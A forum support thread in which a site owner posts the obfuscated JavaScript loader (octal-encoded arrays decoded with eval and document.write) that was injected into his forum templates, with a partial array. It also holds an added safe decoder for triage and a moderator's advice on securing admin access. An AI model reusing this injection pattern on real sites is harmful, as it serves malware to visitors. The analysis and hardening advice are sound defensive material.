Code Injected


  • Code Injected

    I was lazy, so the fault was mine. I was still using 3.8.0 and somehow, someone injected malware into my forum using an existing admin account on the forum home template of every style. This caused a popup ActiveX control prompt that was linked to a site that Firefox wouldn't let me view because it was a known malware site.

    Here is the code:

    Code:
    <script language="javascript">
    MaIlMe=new Array();
    MaIlMe[0]="045063103110124115114045063105045060101045063103110105101104045063";
    MaIlMe[1]="105045060101045063103163143162151160164045063105045060101";
    MaIlMe[2]="166141162045062060144143045063104144157143165155145156164056";
    MaIlMe[3]="167162151164145045063102045060101166141162045062060163143";
    ----code removed for size constraints---------
    MaIlMe[754]="103061061066045062103066062045062071045062071045063102045060";
    MaIlMe[755]="101045063103057163143162151160164045063105045060101045060101";
    OutString="";for(i=0;i<MaIlMe.length;i++){
    for(j=0;j<MaIlMe[i].length;j+=3){
    OutString+=eval("\"\\"+MaIlMe[i].slice(j,j+3)+"\"");
    }}document.write(unescape(OutString));</script>
    I'm not sure how this was done or what I could have done to stop it. I KNOW the account that was used was a trusted one, my business partner. Is there anything I can do to further protect my site, other than update, which I have done? If you need the full code, I have it also, but didn't think it was necessary to post here.
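
The loader in the post above turns each three-digit group into a character through an octal string escape, then passes the result to `unescape()` and `document.write()`. The following is an added example (not part of the original post) that decodes both layers to plain text in Node.js without evaluating or rendering anything; the function names are hypothetical and the input is the four array entries visible in the post.

```javascript
// Added example, not from the thread. Function names are hypothetical.
// Input: the four array entries visible in the post (the rest was elided there).
const SAMPLE = [
  "045063103110124115114045063105045060101045063103110105101104045063",
  "105045060101045063103163143162151160164045063105045060101",
  "166141162045062060144143045063104144157143165155145156164056",
  "167162151164145045063102045060101166141162045062060163143",
];

// Layer 1: the loader builds "\NNN" and eval()s it, so NNN is an octal
// character code. Parse it as a number instead of evaluating anything.
function decodeOctalTriplets(chunks) {
  let out = "";
  for (const chunk of chunks) {
    if (!/^(?:[0-3][0-7]{2})+$/.test(chunk)) {
      throw new Error("not a run of 3-digit octal codes: " + chunk.slice(0, 12));
    }
    for (let j = 0; j < chunk.length; j += 3) {
      out += String.fromCharCode(parseInt(chunk.slice(j, j + 3), 8));
    }
  }
  return out;
}

// Layer 2: same result as the legacy unescape() the loader calls:
// %XX and %uXXXX become characters, malformed sequences are left untouched.
function percentDecode(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Triage helper: decode both layers and list the HTML tags the payload would
// have written into the template, so a reviewer sees them as text only.
function analyze(chunks) {
  const html = percentDecode(decodeOctalTriplets(chunks));
  const tags = [...new Set(
    [...html.matchAll(/<\s*([a-z][a-z0-9]*)/gi)].map(m => m[1].toLowerCase())
  )];
  return { html, tags };
}

console.log(JSON.stringify(analyze(SAMPLE), null, 2));
```

Run over the complete array from an infected template, the `tags` list shows at a glance what the injected markup would have added to the page.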

  • #2
    Moved to the appropriate forum as this is not a suggestion.

    It's expected and anticipated that administrators will be entering HTML into templates. This is a required function to have vBulletin work and be customizable. What you need to do is secure your vBulletin installation so only those people who require access have access to sensitive locations.

    See:
    http://www.vbulletin.com/forum/showthread.php?t=194701

    As it is now, all staff should be forced to change their passwords including your business partner and yourself. The Admin CP should be secured. It is recommended that passwords are at least 12 characters long and contain letters in both cases as well as numbers and standard punctuation. The more variety the better.

    This site generates decent passwords:
    http://www.techzoom.net/tools/password-generator.en

    There is also a password generator built-in to newer versions of cPanel that is quite good.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.
